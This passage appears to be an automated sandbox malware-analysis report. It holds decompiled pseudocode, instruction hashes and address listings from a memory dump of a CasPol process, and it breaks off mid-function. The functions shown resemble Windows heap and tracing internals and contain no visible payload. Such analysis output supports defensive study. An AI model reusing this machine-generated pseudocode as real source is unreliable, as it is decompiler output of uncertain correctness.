                                                                0x016690bb
                                                                0x016690bf
                                                                0x016690c2
                                                                0x016690c2
                                                                0x016690c8
                                                                0x016690cb
                                                                0x016690cd
                                                                0x016a14d7
                                                                0x016a14eb
                                                                0x016a14eb
                                                                0x00000000
                                                                0x016a14eb
                                                                0x016a14db
                                                                0x016a14e6
                                                                0x00000000
                                                                0x016a14f2
                                                                0x016a14e8
                                                                0x00000000
                                                                0x016a14e8
                                                                0x016690d8
                                                                0x016690da
                                                                0x016690dd
                                                                0x016690e5
                                                                0x00000000
                                                                0x01669139
                                                                0x016690fa
                                                                0x016690fe
                                                                0x01669142
                                                                0x00000000
                                                                0x01669142
                                                                0x01669104
                                                                0x01669107
                                                                0x0166910b
                                                                0x01669110
                                                                0x01669118
                                                                0x01669147
                                                                0x01669148
                                                                0x0166914f
                                                                0x01669150
                                                                0x01669151
                                                                0x01669152
                                                                0x01669156
                                                                0x0166915d
                                                                0x01669160
                                                                0x01669168
                                                                0x0166916c
                                                                0x016691bc
                                                                0x016691be
                                                                0x00000000
                                                                0x016691be
                                                                0x0166916e
                                                                0x01669173
                                                                0x01669176
                                                                0x00000000
                                                                0x00000000
                                                                0x0166917c
                                                                0x01669180
                                                                0x016691b5
                                                                0x00000000
                                                                0x016691b5
                                                                0x01669182
                                                                0x01669185
                                                                0x01669189
                                                                0x00000000
                                                                0x00000000
                                                                0x0166918e
                                                                0x01669190
                                                                0x01669198
                                                                0x00000000
                                                                0x00000000
                                                                0x016691a0
                                                                0x00000000
                                                                0x016691ad
                                                                0x016691ad
                                                                0x016691b0
                                                                0x016691b1
                                                                0x00000000
                                                                0x01669185
                                                                0x0166911a
                                                                0x0166911c
                                                                0x0166911f
                                                                0x01669125
                                                                0x01669127
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                • Instruction ID: 7f3863aed1059b53172c0e13706e2b37268e60d80c5ec51fb48dad10838f32aa
                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                • Instruction Fuzzy Hash: 8C214971A00205EFDB21DF69CD44AAAFBF8EF54754F2488AEE949A7250D730AD41CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01653B7A Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 59%
                                                                			E01653B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x17184c4; // 0x0
				_v12 = 1;
				_v8 =  *0x17184c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x17184c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0166AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0166FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x17184c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x17184c4; // 0x0
					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                0x01653b89
                                                                0x01653b96
                                                                0x01653ba1
                                                                0x01653bab
                                                                0x01653bb5
                                                                0x01653bb9
                                                                0x01696298
                                                                0x01653bbf
                                                                0x01653bc2
                                                                0x01653bc3
                                                                0x01653bc9
                                                                0x01653bca
                                                                0x01653bcc
                                                                0x01653bcd
                                                                0x01653bd4
                                                                0x01653bd6
                                                                0x01653bdb
                                                                0x01653bea
                                                                0x01653bf7
                                                                0x01653bfb
                                                                0x01653bff
                                                                0x01653c09
                                                                0x01653c0a
                                                                0x01653c0b
                                                                0x01653c0f
                                                                0x01653c14
                                                                0x01653c18
                                                                0x01653c18
                                                                0x01653bfb
                                                                0x01653c1b
                                                                0x01653c30
                                                                0x01653c30
                                                                0x01653c3d

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9eeb9c066ee90def3bcf83509c035b756c40f96606f9d9f734eb0197e6df247a
                                                                • Instruction ID: bff564908894162035f9d44cc7a7a8d6428239a8d08402ce60f528cfada750d9
                                                                • Opcode Fuzzy Hash: 9eeb9c066ee90def3bcf83509c035b756c40f96606f9d9f734eb0197e6df247a
                                                                • Instruction Fuzzy Hash: C1219F72A00109AFC710DF98CD81B6ABBBEFB44758F1540A8EA08AB251D771ED01CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016A6CF0 Relevance: .1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 80%
                                                                			E016A6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01647D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01647D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1605c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0165F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0165F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E016A7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01642400( &_v52);
								}
								_t21 = L01642400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                0x016a6cfb
                                                                0x016a6d00
                                                                0x016a6d02
                                                                0x016a6d06
                                                                0x016a6d0a
                                                                0x016a6d0e
                                                                0x016a6d19
                                                                0x016a6d2b
                                                                0x016a6d1b
                                                                0x016a6d24
                                                                0x016a6d24
                                                                0x016a6d33
                                                                0x016a6d39
                                                                0x016a6d46
                                                                0x016a6d4f
                                                                0x016a6d61
                                                                0x016a6d51
                                                                0x016a6d5a
                                                                0x016a6d5a
                                                                0x016a6d69
                                                                0x016a6d6b
                                                                0x016a6d6d
                                                                0x016a6d6f
                                                                0x016a6d6f
                                                                0x016a6d74
                                                                0x016a6d79
                                                                0x016a6d7a
                                                                0x016a6d7f
                                                                0x016a6d82
                                                                0x016a6d88
                                                                0x016a6d89
                                                                0x016a6d90
                                                                0x016a6d94
                                                                0x016a6da7
                                                                0x016a6db1
                                                                0x016a6db1
                                                                0x016a6dbb
                                                                0x016a6dbb
                                                                0x016a6d90
                                                                0x016a6d69
                                                                0x016a6d46
                                                                0x016a6dc6

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7dc951b8f7eec0479adec0651f20940e3cd6cc22880d3745e69911a3a8e89dbb
                                                                • Instruction ID: 4a07a17e43962e85e71d7a698d455f898e0bbcbef91079021bed0c52ec064c95
                                                                • Opcode Fuzzy Hash: 7dc951b8f7eec0479adec0651f20940e3cd6cc22880d3745e69911a3a8e89dbb
                                                                • Instruction Fuzzy Hash: BB21F2735002469BD311EF28CD44B6BBBECEF91680F48095AFA50C7251E734D949CAE6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F070D Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 67%
                                                                			E016F070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E016F07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E016EAFDE( &_v8,  &_v12);
					E016F1293(_t38, _v28, _t60);
					if(E01647D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E016E14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                0x016f071b
                                                                0x016f0724
                                                                0x016f0734
                                                                0x016f0738
                                                                0x016f074b
                                                                0x016f074b
                                                                0x016f0753
                                                                0x016f0753
                                                                0x016f0759
                                                                0x016f075d
                                                                0x016f0774
                                                                0x016f0779
                                                                0x016f077d
                                                                0x016f0789
                                                                0x016f0795
                                                                0x016f07a7
                                                                0x016f0797
                                                                0x016f07a0
                                                                0x016f07a0
                                                                0x016f07af
                                                                0x016f07c4
                                                                0x016f07cd
                                                                0x016f07cd
                                                                0x016f07af
                                                                0x016f07dc

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                • Instruction ID: a39f25407c0c9c46adf4e99a86b4c7394984e4275a8be005a26c277e6efd2cb9
                                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                • Instruction Fuzzy Hash: 222122362042009FD705DF18CC84B6ABBA7EBD4350F04866DFA948B382C730D809CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F2EF7 Relevance: .1, Instructions: 72COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 35%
                                                                			E016F2EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_t114 = 3;
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x171d360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t27 = _t115 + 0x20; // 0x20
							_t62 = _t27;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = E0166D0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = E0166D0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
					_v44 = _t155 + 0x10;
					E01642280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x171b1e0();
						 *( *(_t106 + 0x30) ^  *0x1716110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x171b1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x1716110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					E0163FFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E0166B640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x160ac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}






































                                                                0x016f2efc
                                                                0x016f2efd
                                                                0x016f2eff
                                                                0x016f2f03
                                                                0x016f2f0a
                                                                0x016f2f0c
                                                                0x016f2f15
                                                                0x016f2fba
                                                                0x016f2fbb
                                                                0x016f2fc5
                                                                0x016f2fcd
                                                                0x016f2fcf
                                                                0x016f2fd3
                                                                0x016f2fd4
                                                                0x016f2fd5
                                                                0x016f2fd7
                                                                0x016f2fda
                                                                0x016f2fdb
                                                                0x016f2fdd
                                                                0x016f2fe0
                                                                0x016f2fe2
                                                                0x016f2ffc
                                                                0x016f2fe4
                                                                0x016f2fe4
                                                                0x016f2fea
                                                                0x016f2fed
                                                                0x016f2fef
                                                                0x016f2ff6
                                                                0x016f2ff1
                                                                0x016f2ff1
                                                                0x016f2ff1
                                                                0x016f2fef
                                                                0x016f2fff
                                                                0x016f3001
                                                                0x016f301b
                                                                0x016f3003
                                                                0x016f3003
                                                                0x016f300e
                                                                0x016f3015
                                                                0x016f3010
                                                                0x016f3010
                                                                0x016f3010
                                                                0x016f3010
                                                                0x016f300e
                                                                0x016f302c
                                                                0x016f3035
                                                                0x016f303c
                                                                0x016f3046
                                                                0x016f304e
                                                                0x016f3056
                                                                0x016f305a
                                                                0x016f305e
                                                                0x016f3063
                                                                0x016f3067
                                                                0x016f306b
                                                                0x016f306f
                                                                0x016f3072
                                                                0x016f30af
                                                                0x016f30b5
                                                                0x016f30c1
                                                                0x016f30c9
                                                                0x016f30c9
                                                                0x016f30c9
                                                                0x00000000
                                                                0x016f3074
                                                                0x016f3081
                                                                0x016f3089
                                                                0x016f308b
                                                                0x016f308d
                                                                0x016f3093
                                                                0x016f309a
                                                                0x016f30ce
                                                                0x016f30d1
                                                                0x016f30d5
                                                                0x016f30d5
                                                                0x016f30d5
                                                                0x016f308d
                                                                0x016f30db
                                                                0x016f30e6
                                                                0x016f30e7
                                                                0x016f30e8
                                                                0x016f30e9
                                                                0x016f30f3
                                                                0x016f2f27
                                                                0x016f2f29
                                                                0x016f2f2b
                                                                0x016f2f2d
                                                                0x016f2f36
                                                                0x016f2f3d
                                                                0x016f2f4c
                                                                0x016f2f58
                                                                0x016f2fad
                                                                0x016f2fb7
                                                                0x016f2fb7

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d01b902984eca0a5be8b4742c325092134b06a4796f1053802a0008da9ac9848
                                                                • Instruction ID: 5ad6cde3b7ed68815309e3870f7569041139c4fe534ffe5fadcb582e5743b963
                                                                • Opcode Fuzzy Hash: d01b902984eca0a5be8b4742c325092134b06a4796f1053802a0008da9ac9848
                                                                • Instruction Fuzzy Hash: FB21BBB12142500FD706CF5ACCA49B7BFE5EFC611235B81E9D988CB743C924941AC7A0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165ABD8 Relevance: .1, Instructions: 70COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 96%
                                                                			E0165ABD8(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				signed char _t22;
				intOrPtr _t31;
				signed char _t34;
				signed char _t42;
				unsigned int _t44;
				void* _t49;
				signed int* _t53;

				_push(__ecx);
				_t49 = __ecx;
				_t18 = __ecx + 0xc0;
				_t31 =  *((intOrPtr*)(_t18 + 4));
				while(_t31 != _t18) {
					_t9 = _t31 - 8; // -8
					_t53 = _t9;
					if( *(_t49 + 0x4c) != 0) {
						_t44 =  *(_t49 + 0x50) ^  *_t53;
						 *_t53 = _t44;
						_t38 = _t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44;
						if(_t44 >> 0x18 != (_t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44)) {
							E016DFA2B(_t31, _t49, _t53, _t49, _t53, __eflags, _t38);
						}
					}
					_t34 =  *_t53 & 0x0000ffff;
					_t18 = 0x200;
					_t42 = _t34 >> 8;
					if(_t34 <= 0x200) {
						__eflags =  *(_t49 + 0x4c);
						if( *(_t49 + 0x4c) != 0) {
							_t53[0] = _t53[0] ^ _t42 ^ _t34;
							_t18 =  *(_t49 + 0x50);
							 *_t53 =  *_t53 ^ _t18;
							__eflags =  *_t53;
						}
						break;
					}
					_t22 = _t53[0];
					if((_t22 & 0x00000008) != 0) {
						__eflags =  *(_t49 + 0x4c);
						if(__eflags != 0) {
							_t53[0] = _t22 ^ _t42 ^ _t34;
							 *_t53 =  *_t53 ^  *(_t49 + 0x50);
							__eflags =  *_t53;
						}
					} else {
						E0165AC7B(_t49, _t53);
					}
					_t31 =  *((intOrPtr*)(_t31 + 4));
					_t18 = _t49 + 0xc0;
				}
				return _t18;
			}















                                                                0x0165abe0
                                                                0x0165abe4
                                                                0x0165abe6
                                                                0x0165abec
                                                                0x0165ac0c
                                                                0x0165ac14
                                                                0x0165ac14
                                                                0x0165ac17
                                                                0x0165ac1c
                                                                0x0165ac20
                                                                0x0165ac2c
                                                                0x0165ac33
                                                                0x01699f40
                                                                0x01699f40
                                                                0x0165ac33
                                                                0x0165ac39
                                                                0x0165ac3c
                                                                0x0165ac44
                                                                0x0165ac4b
                                                                0x0165ac5f
                                                                0x0165ac63
                                                                0x0165ac6c
                                                                0x0165ac6f
                                                                0x0165ac72
                                                                0x0165ac72
                                                                0x0165ac72
                                                                0x00000000
                                                                0x0165ac63
                                                                0x0165ac4d
                                                                0x0165ac52
                                                                0x0165abf1
                                                                0x0165abf5
                                                                0x0165abfb
                                                                0x0165ac01
                                                                0x0165ac01
                                                                0x0165ac01
                                                                0x0165ac54
                                                                0x0165ac58
                                                                0x0165ac58
                                                                0x0165ac03
                                                                0x0165ac06
                                                                0x0165ac06
                                                                0x0165ac7a

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
                                                                • Instruction ID: 275ccb9618d56edb87d335db1b9fada59eb965cdfbb7813e579abb04061c2fbd
                                                                • Opcode Fuzzy Hash: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
                                                                • Instruction Fuzzy Hash: 6821E4302006069BDB28CF6DC8846F6BBE6FB99304F54831ED9D687741D731B806CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F1FF1 Relevance: .1, Instructions: 70COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 77%
                                                                			E016F1FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _t22;
				signed int _t34;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t54;
				signed int _t55;

				_t44 = _a4;
				_v8 = __edx;
				_t3 = _t44 + 0x1007; // 0x1007
				_t41 = _t3 & 0xfffff000;
				_t54 = ( *_t44 ^  *0x1716110 ^ _t44) >> 0x00000001 & 0x00007fff;
				if(_t41 - _t44 < _t54 << 3) {
					_t42 = _t41 + 0xfffffff0;
					_t34 = _t42 - _t44 >> 3;
					_t55 = _t54 - _t34;
					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x1716110 ^ _t44) & 0x0000fffe;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
					 *_t42 = _t22;
					_t38 = _t42 + _t55 * 8;
					 *_t42 = _t22 ^  *0x1716110 ^ _t42;
					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x1716110 ^ _t38 ^  *_t38) & 0x7fff0000;
					}
				} else {
					_t42 = 0;
				}
				return _t42;
			}












                                                                0x016f1ff9
                                                                0x016f1ffc
                                                                0x016f2001
                                                                0x016f200d
                                                                0x016f201b
                                                                0x016f2028
                                                                0x016f202e
                                                                0x016f2035
                                                                0x016f2038
                                                                0x016f204c
                                                                0x016f2052
                                                                0x016f2053
                                                                0x016f2054
                                                                0x016f2055
                                                                0x016f2069
                                                                0x016f206c
                                                                0x016f206e
                                                                0x016f2079
                                                                0x016f2087
                                                                0x016f209c
                                                                0x016f209c
                                                                0x016f202a
                                                                0x016f202a
                                                                0x016f202a
                                                                0x016f20a5

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6bca8a5b1389e3bbe033c05dd73300f037435109586239d8a943d58f6e111ddc
                                                                • Instruction ID: c11dea23bc7c195587871aadfffe60b3a0d71be96358ad35e1485becb1cc8d4a
                                                                • Opcode Fuzzy Hash: 6bca8a5b1389e3bbe033c05dd73300f037435109586239d8a943d58f6e111ddc
                                                                • Instruction Fuzzy Hash: 1E21A233A104159B9B18CF7CC815566F7E6EF8C22032A867ED912DB265EAB0BD11CB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016A7794 Relevance: .1, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 82%
                                                                			E016A7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1717b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0166F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01647D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01669AE0();
					_t24 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                0x016a7799
                                                                0x016a779a
                                                                0x016a779b
                                                                0x016a77a3
                                                                0x016a77ab
                                                                0x016a77ae
                                                                0x016a77b1
                                                                0x016a77b1
                                                                0x016a77bf
                                                                0x016a77c4
                                                                0x016a77c8
                                                                0x016a77ce
                                                                0x016a77d4
                                                                0x016a77e0
                                                                0x016a77e0
                                                                0x016a77d6
                                                                0x016a77d6
                                                                0x016a77de
                                                                0x00000000
                                                                0x00000000
                                                                0x016a77de
                                                                0x016a77e5
                                                                0x016a77f0
                                                                0x016a77f3
                                                                0x016a77f6
                                                                0x016a77fd
                                                                0x016a7800
                                                                0x016a780c
                                                                0x016a7818
                                                                0x016a782b
                                                                0x016a781a
                                                                0x016a7823
                                                                0x016a7823
                                                                0x016a7830
                                                                0x016a7831
                                                                0x016a7838
                                                                0x016a783d
                                                                0x016a783e
                                                                0x016a784f
                                                                0x016a784f
                                                                0x016a785a

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2f281d653b8d8fdc82a51b54e74d4c7dfe11b5bae14832dbb9cabadb654870c
                                                                • Instruction ID: fe96b65a51ca095c3315c76bc31bbfd9237e8ba67513c9a93cde4614c405a298
                                                                • Opcode Fuzzy Hash: b2f281d653b8d8fdc82a51b54e74d4c7dfe11b5bae14832dbb9cabadb654870c
                                                                • Instruction Fuzzy Hash: 1E216D72900644ABC725DF69DC90EABBBA9EF48740F10456DEA0AD7750DB35ED00CBA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164AE73 Relevance: .1, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 96%
                                                                			E0164AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
